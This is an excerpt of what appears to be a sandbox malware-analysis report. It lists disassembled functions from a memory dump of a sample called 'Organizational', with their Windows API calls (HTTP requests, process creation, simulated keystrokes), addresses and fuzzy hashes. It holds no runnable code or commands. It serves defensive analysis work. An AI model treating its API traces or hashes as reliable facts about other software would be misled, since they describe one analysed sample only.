                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                          • String ID:
                                                          • API String ID: 3430376129-0
                                                          • Opcode ID: ae1950a82574fab518bc06f9e99e0863778365d7862a6af02bc0edf310a0393d
                                                          • Instruction ID: 5dda4bfc7f43364f8014eef7a6edc99c66337d07cfef3d066973fb80c08cef7d
                                                          • Opcode Fuzzy Hash: ae1950a82574fab518bc06f9e99e0863778365d7862a6af02bc0edf310a0393d
                                                          • Instruction Fuzzy Hash: 5F119031140245FFDB615FA4EC8CBA97B75EB08322F504221FA29990E1CBB109A6EF20
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0025ADE1
                                                          • OleUninitialize.OLE32(?,00000000), ref: 0025AE80
                                                          • UnregisterHotKey.USER32(?), ref: 0025AFD7
                                                          • DestroyWindow.USER32(?), ref: 00292F64
                                                          • FreeLibrary.KERNEL32(?), ref: 00292FC9
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00292FF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 0f5f234270e5efe431b5b40fd9fea45b7bbe1c063367c72105f234944a4a3de8
                                                          • Instruction ID: 9994690198b518d62db60b3fea421207b4feed55d4559e0614c2f99228d2c9d7
                                                          • Opcode Fuzzy Hash: 0f5f234270e5efe431b5b40fd9fea45b7bbe1c063367c72105f234944a4a3de8
                                                          • Instruction Fuzzy Hash: 2BA17C30721212DFCB29EF14C899A69F364FF04701F1442ADE80AAB651CB31AD7ACF95
                                                          APIs
                                                          • EnumChildWindows.USER32(?,002AB13A), ref: 002AB078
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: e26621511f06cecb6fd112d6a25f8109e1703e267a76786f975f3fb2e93c8859
                                                          • Instruction ID: afb7bd7c4f4f881f8466cb4c7c4786123ef4de8c5eaf239f0acf4273b2c8caf8
                                                          • Opcode Fuzzy Hash: e26621511f06cecb6fd112d6a25f8109e1703e267a76786f975f3fb2e93c8859
                                                          • Instruction Fuzzy Hash: D191A370520606EFCB19EF60C481BEEFB74BF06300F54811AE85AA7191DF3169B9DB91
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 0025327E
                                                            • Part of subcall function 0025218F: GetClientRect.USER32(?,?), ref: 002521B8
                                                            • Part of subcall function 0025218F: GetWindowRect.USER32(?,?), ref: 002521F9
                                                            • Part of subcall function 0025218F: ScreenToClient.USER32(?,?), ref: 00252221
                                                          • GetDC.USER32 ref: 0028D073
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0028D086
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0028D094
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0028D0A9
                                                          • ReleaseDC.USER32(?,00000000), ref: 0028D0B1
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0028D13C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 574f4552bcf20c73f2b155354d2db81452e67659c8b21b1ad934e596890fd036
                                                          • Instruction ID: a327ad84ef631eb371b2ca2c07a4c81ee9d5e69024ed7110cdb5ec466a8b0af9
                                                          • Opcode Fuzzy Hash: 574f4552bcf20c73f2b155354d2db81452e67659c8b21b1ad934e596890fd036
                                                          • Instruction Fuzzy Hash: A4714634421206DFCF21EF64C884AAA7BB5FF49361F144265ED559A1E5C7318CA9DF20
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                            • Part of subcall function 00252714: GetCursorPos.USER32(?), ref: 00252727
                                                            • Part of subcall function 00252714: ScreenToClient.USER32(003177B0,?), ref: 00252744
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000001), ref: 00252769
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000002), ref: 00252777
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 002DC69C
                                                          • ImageList_EndDrag.COMCTL32 ref: 002DC6A2
                                                          • ReleaseCapture.USER32 ref: 002DC6A8
                                                          • SetWindowTextW.USER32(?,00000000), ref: 002DC752
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002DC765
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 002DC847
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: 2732ec0d351679027254ad945b3b6b0ae3f906ac0e4fda8a41fed3e8c74824f9
                                                          • Instruction ID: 30e7e25dd7ea951ba39c7dce669a65bd14d542d38fe46b581e5d86fc4cecf9e4
                                                          • Opcode Fuzzy Hash: 2732ec0d351679027254ad945b3b6b0ae3f906ac0e4fda8a41fed3e8c74824f9
                                                          • Instruction Fuzzy Hash: D051AD70218205AFD705EF14CC9AFAA77F5EB88310F14851AF955872E1CB70ADA9CF62
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C211C
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002C2148
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002C218A
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002C219F
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C21AC
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002C21DC
                                                          • InternetCloseHandle.WININET(00000000), ref: 002C2223
                                                            • Part of subcall function 002C2B4F: GetLastError.KERNEL32(?,?,002C1EE3,00000000,00000000,00000001), ref: 002C2B64
                                                            • Part of subcall function 002C2B4F: SetEvent.KERNEL32(?,?,002C1EE3,00000000,00000000,00000001), ref: 002C2B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: 873fc61b6bfd843892ba7dea675c0f20d379c5ac1b307695089cb6b75c043575
                                                          • Instruction ID: 4621a0b6414206511db66f6a2ebbb17613162e918a99fd1139fda30eb213b435
                                                          • Opcode Fuzzy Hash: 873fc61b6bfd843892ba7dea675c0f20d379c5ac1b307695089cb6b75c043575
                                                          • Instruction Fuzzy Hash: B441A1B1550219FFEB129F50DC89FBB7BACEF08354F04421AFE049A141DBB09D598BA1
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,002E0980), ref: 002C9412
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002E0980), ref: 002C9446
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C95C0
                                                          • SysFreeString.OLEAUT32(?), ref: 002C95EA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: f7e3542e3f84d9b1f3f59aa6259ca248671582e079dc7398a0aa33da4a5feb52
                                                          • Instruction ID: 60172a0472ec491ef68b0acef2e0667a32d20491a4dd0ccd81857db8702f6ae6
                                                          • Opcode Fuzzy Hash: f7e3542e3f84d9b1f3f59aa6259ca248671582e079dc7398a0aa33da4a5feb52
                                                          • Instruction Fuzzy Hash: D5F12C71A20209EFCF14DF94C888EAEB7B9FF45315F108198F905AB251DB71AE96CB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002CFD9E
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CFF31
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CFF55
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CFF95
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CFFB7
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002D0133
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002D0165
                                                          • CloseHandle.KERNEL32(?), ref: 002D0194
                                                          • CloseHandle.KERNEL32(?), ref: 002D020B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 879c614d3bf2e140419d53ae6b5a0b0622f9797562616ed7228c3200a6b9f61f
                                                          • Instruction ID: 80ccb0164d4f6aac54bf6993c2f44dd422644fdf4ba556e8ae1e087d3690c552
                                                          • Opcode Fuzzy Hash: 879c614d3bf2e140419d53ae6b5a0b0622f9797562616ed7228c3200a6b9f61f
                                                          • Instruction Fuzzy Hash: 6DE19D312243419FC714EF24C895B6ABBE1EF85314F14856DF8899B2A2CB71EC65CF52
                                                          APIs
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3B8A,?), ref: 002B4BE0
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3B8A,?), ref: 002B4BF9
                                                            • Part of subcall function 002B4FEC: GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 002B52FB
                                                          • _wcscmp.LIBCMT ref: 002B5315
                                                          • MoveFileW.KERNEL32(?,?), ref: 002B5330
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: cd9b255390f9b173276f90ce09a026e6f9c9a1425e8112852dd9f428cdbd3e38
                                                          • Instruction ID: b21c30c11c6ef7d0ca74577a576111613fc5977ecae9ac7bf0f9b123d221fee6
                                                          • Opcode Fuzzy Hash: cd9b255390f9b173276f90ce09a026e6f9c9a1425e8112852dd9f428cdbd3e38
                                                          • Instruction Fuzzy Hash: 255194B20187959BC724EFA0D881ADFB3EC9F84340F50491EF689C7152EF74A698CB56
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D8D24
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: e416b8f1bc6e7858372e4e53fabcc6d1fa8e83ffe98587d9beb083e0f80d5d20
                                                          • Instruction ID: 0a4e3fdffc5e4fd5738a6a02c3c683e5068b8109688b447d5087c89642b87fb3
                                                          • Opcode Fuzzy Hash: e416b8f1bc6e7858372e4e53fabcc6d1fa8e83ffe98587d9beb083e0f80d5d20
                                                          • Instruction Fuzzy Hash: DB518F30670245FEEB249F28CC89B997BB5AB05350F244513F915EA3E1CFB1ADA4CE64
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0028C638
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C65A
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0028C672
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0028C690
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0028C6B1
                                                          • DestroyIcon.USER32(00000000), ref: 0028C6C0
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028C6DD
                                                          • DestroyIcon.USER32(?), ref: 0028C6EC
                                                            • Part of subcall function 002DAAD4: DeleteObject.GDI32(00000000), ref: 002DAB0D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 701069b6135075aa898227946b8c2cea7ddd84bcbe0a3052feb49606a1168c98
                                                          • Instruction ID: 3f2f1fd494b3002f892cd39e9c4bf3b024d3933f80d4570954641b337a13489b
                                                          • Opcode Fuzzy Hash: 701069b6135075aa898227946b8c2cea7ddd84bcbe0a3052feb49606a1168c98
                                                          • Instruction Fuzzy Hash: CF518F74620206EFDB24DF24DC85BAA77B9EB48311F204528F902A76D0D7B0ECA5DF64
                                                          APIs
                                                            • Part of subcall function 002AB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AB54D
                                                            • Part of subcall function 002AB52D: GetCurrentThreadId.KERNEL32 ref: 002AB554
                                                            • Part of subcall function 002AB52D: AttachThreadInput.USER32(00000000,?,002AA23B,?,00000001), ref: 002AB55B
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 002AA246
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002AA263
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002AA266
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 002AA26F
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002AA28D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002AA290
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 002AA299
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002AA2B0
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002AA2B3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: e6908c4f58be1f7c9a6d1d5d51d1641a08c9ed861ca36a90a61b7c3fdbd8be3f
                                                          • Instruction ID: b112a2b003f2c37a1d86f0e6efdacef3d64817749590858dfad3103602823372
                                                          • Opcode Fuzzy Hash: e6908c4f58be1f7c9a6d1d5d51d1641a08c9ed861ca36a90a61b7c3fdbd8be3f
                                                          • Instruction Fuzzy Hash: DF11C271990258BFFA106B60ACCDF6A7B1DDB4D750F500415F6446F090CAF26CA1DEA4
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002A915A,00000B00,?,?), ref: 002A94E2
                                                          • HeapAlloc.KERNEL32(00000000,?,002A915A,00000B00,?,?), ref: 002A94E9
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A915A,00000B00,?,?), ref: 002A94FE
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,002A915A,00000B00,?,?), ref: 002A9506
                                                          • DuplicateHandle.KERNEL32(00000000,?,002A915A,00000B00,?,?), ref: 002A9509
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002A915A,00000B00,?,?), ref: 002A9519
                                                          • GetCurrentProcess.KERNEL32(002A915A,00000000,?,002A915A,00000B00,?,?), ref: 002A9521
                                                          • DuplicateHandle.KERNEL32(00000000,?,002A915A,00000B00,?,?), ref: 002A9524
                                                          • CreateThread.KERNEL32(00000000,00000000,002A954A,00000000,00000000,00000000), ref: 002A953E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 6ff08eb5da3178d011708bec0850d7ffc1640e7fc0caf795161336c085cc1b74
                                                          • Instruction ID: 3280bd538ab869715d28bf58b99b1afbd99822b426fbe0b91d7b26d70882a380
                                                          • Opcode Fuzzy Hash: 6ff08eb5da3178d011708bec0850d7ffc1640e7fc0caf795161336c085cc1b74
                                                          • Instruction Fuzzy Hash: 9C01BBB5680344BFE710ABA5ECCDF6B7BACEB89711F404411FA05DF1A1CAB0A841CB20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 7ebe6318e73ef5201b5607d5ec5d88afae14b286be0cbc502118223a7928c21c
                                                          • Instruction ID: 4b3709b59f256f24bbff8ca5418b6a82df7c3b9f21f4665451e4d7c72bfa25ca
                                                          • Opcode Fuzzy Hash: 7ebe6318e73ef5201b5607d5ec5d88afae14b286be0cbc502118223a7928c21c
                                                          • Instruction Fuzzy Hash: 47C1A171E2021A9FDF14CFA8C884FAEB7B5BB48348F14856DE905AB280E7709D55CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-625585964
                                                          • Opcode ID: 54fca919ba7505cecabb9eb6305e8aafab3b19bcdc8b47932dcd038bbe1c6c09
                                                          • Instruction ID: baa31f55eaefcb07a2eb9a64a931933f93212d441be1627108ad1ee329cd9e69
